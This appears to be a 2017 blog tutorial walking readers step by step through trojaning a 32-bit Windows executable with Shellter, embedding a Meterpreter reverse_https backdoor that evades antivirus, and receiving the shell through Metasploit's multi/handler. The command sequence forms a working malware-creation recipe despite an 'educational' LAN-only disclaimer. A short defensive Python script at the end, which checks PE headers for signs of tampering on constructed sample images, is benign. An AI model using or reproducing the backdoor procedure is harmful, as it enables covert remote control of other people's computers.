March 23, 2017
Tutorial: Avoid Antiviruses and Compromise Workstations - Part 1
It's 2017 and traditional Antivirus solutions are becoming more and more obsolete with every passing day. The rise of exploit kits and "do it yourself malware" means that organizations can no longer rely solely on Antivirus solutions to keep them safe. In fact, someone with little experience can now make a unique piece of malware that is capable of evading the majority, if not all, traditional Antivirus solutions.

This is a guide aimed at all skill levels, from students to professional penetration testers, and aims to show how anyone can create their own unique piece of Malware (capable of evading AV) that gives them remote access to a machine by using Metasploit and Shellter.

Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. This guide is limited to a LAN and does not detail how to set up port forwarding from public IPs to private IPs, command and control servers, or how to configure firewalls. This is largely unnecessary for isolated demonstrations; however, if enough interest is shown I may add this to another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what all of the commands are performing in this particular tutorial, but depending on the community response I will look to explain it more in depth in another post.

Meterpreter and Shellter

Creating the backdoor
- Elevate to root and download Shellter - open a terminal and type:
    sudo su
    apt-get install shellter
- Find a 32-bit executable vulnerable to PE Injection (the uninstall files found after installing a program work well). Copy this to your Kali Desktop.
- Change directory and run Shellter - in the same terminal type:
    cd Desktop
    shellter &
- Under Operation mode select automatic and choose your executable target - type:
    a
    <Filename of vulnerable 32-bit executable>
- The program will attempt to find an entry point for the backdoor. If the program throws errors and fails, find a different executable to use.
- Under Enable Stealth mode - type:
    Y to attempt to preserve the original .exe functionality (not recommended if you used an uninstall executable)
    OR
    N to strip the program's original functionality and just run as a backdoor.
- Under Payloads - type:
    L followed by a number to use a native Meterpreter backdoor
    OR
    C to use a custom script
- Find out your local IP address - open your existing terminal and type:
    ifconfig
- Note your local IP address, e.g. 192.168.218.128 (denoted next to 'inet').
- Set the destination IP for the payload - return to Shellter and type:
    <Local IP Address>
    <Local port to run on, e.g. 8080>
- You will see Injection: Verified!
- Run the Metasploit framework - Open your existing terminal and type:msfconsole
- Run the Metasploit handler – type:use exploit/multi/handler
- Set up your handler with the payload matching the one set on your backdoor - e.g. type:
    set payload windows/meterpreter/reverse_https
    set lport <local port to run on, e.g. 8080>
    set lhost <Local IP Address>
- Run your listener and handler – type:exploit
- This will now create your meterpreter console. Ensure your victim machine is on the same network as you and is within the same broadcast range. Run the infected executable on the victim machine.
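The procedure above plants a Meterpreter payload inside an existing 32-bit PE and relies on the modified file still passing Antivirus. The following added example is mine, not code from this post, from Shellter or from Metasploit; it shows the kind of static check a defender or analyst can run over a suspicious Windows binary before trusting an AV verdict. It parses the PE32 headers and flags two layout anomalies commonly used as heuristics for tampered executables: an entry point that lies outside any code section, and a section marked both writable and executable. The two images it inspects are constructed header-only stubs built inline (not real programs and not output of any tool), the chosen heuristics are my assumptions about what is worth looking at, and the post says nothing about what Shellter's output looks like; a clean result from these checks is not evidence that a file is benign.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
COFF_FMT = "<HHIIIHH"
# Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics (40 bytes).
SECTION_FMT = "<8sIIIIIIHHI"


def parse_pe(data: bytes) -> dict:
    """Read the COFF header, AddressOfEntryPoint and section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsects, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsects):
        fields = struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({
            "name": fields[0].rstrip(b"\x00").decode("ascii", errors="replace"),
            "vsize": fields[1],
            "rva": fields[2],
            "chars": fields[9],
        })
    return {"machine": machine, "entry_rva": entry_rva, "sections": sections}


def inspect_pe(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing looked odd."""
    info = parse_pe(data)
    findings = []
    entry_section = None
    for s in info["sections"]:
        if s["rva"] <= info["entry_rva"] < s["rva"] + s["vsize"]:
            entry_section = s
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']} is both writable and executable")
    if entry_section is None:
        findings.append("entry point lies outside every section")
    elif not entry_section["chars"] & IMAGE_SCN_CNT_CODE:
        findings.append(f"entry point lies in non-code section {entry_section['name']}")
    return findings


def build_pe(sections, entry_rva: int) -> bytes:
    """Assemble a header-only PE32 image (constructed test input, not a runnable program)."""
    opt_size = 224  # size of a standard PE32 optional header
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    # Magic, linker versions, SizeOfCode, SizeOfInitializedData,
    # SizeOfUninitializedData, AddressOfEntryPoint, BaseOfCode, BaseOfData
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva, 0, 0)
    opt += b"\x00" * (opt_size - len(opt))
    table = b"".join(struct.pack(SECTION_FMT, name, size, rva, size, 0, 0, 0, 0, 0, chars)
                     for name, rva, size, chars in sections)
    return dos + b"PE\x00\x00" + coff + opt + table


# Constructed samples: a conventional layout, and one whose entry point sits in a
# writable, executable data section. Neither is the output of any real tool.
CLEAN_IMAGE = build_pe([
    (b".text", 0x1000, 0x2000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x3000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
], entry_rva=0x1100)

SUSPICIOUS_IMAGE = build_pe([
    (b".text", 0x1000, 0x2000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x3000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
                               | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
], entry_rva=0x3200)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_IMAGE), ("suspicious", SUSPICIOUS_IMAGE)):
        print(label, inspect_pe(image) or ["no findings"])
```

To use it on a real file, read the bytes and pass them to inspect_pe; the parser deliberately rejects PE32+ (64-bit) images because the optional header layout differs, which mirrors the post's own restriction to 32-bit targets.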